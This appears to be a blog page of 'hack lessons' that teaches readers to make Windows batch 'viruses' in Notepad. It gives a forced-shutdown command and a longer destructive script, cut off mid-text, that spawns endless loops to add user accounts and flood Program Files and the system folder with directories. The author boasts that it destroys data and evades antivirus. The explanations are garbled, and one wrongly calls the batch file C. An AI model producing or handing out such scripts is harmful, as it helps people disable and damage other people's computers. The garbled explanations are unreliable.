Posts

Showing posts with the label hacking codes

Hack lessons 1 - Make a virus your self

Image
Make a virus your self         Most of people don't know to make a virus themself. they just copy and paste codes and they really don’t knw what that codes mean . Now i m gonna instruct  you about how to make a simple virus ur self using C programming. This is the code for  shut down da windows.. First of all open the notepad then type this   - @ECHO off Shutdown -s -f -t- 20      And save as a .bat file @Echo off mean First of all i wll tell why do we use “ @ echo off” ,normally u know we save this file as a bat file and it runs in command prompt (DOS). Normally when you open Dos screen it shows C:\Users\Tharindu>  like this .....  when we run a virus it should be off.to off that we type  @echo off S –f –t-20  mean Those are varibles....  there “ 20” means time (seconds)...if u want to shut down it in 3 seconds  delete da 20 and type da 3 .             ...

make a very dangerous virus {notepad}

Image
 I’m gonna make a very dangerous virus.plz don’t try run that virus since you will lose your all data and unexpected shot down your system. Virus guard also not detected as a virus. 1. Open the note –pad window Paste this word @ECHO OFF @ECHO A PHOENIX PRODUCTION @ECHO MAIN BAT RUNNING GOTO start :start @ECHO SET snowball2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5 :bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET maggi=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR maggi%%maggi%% >> bat5.bat @ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4 :bat4 @ECHO CD %%SystemRoot%%\ >> bat4.ba...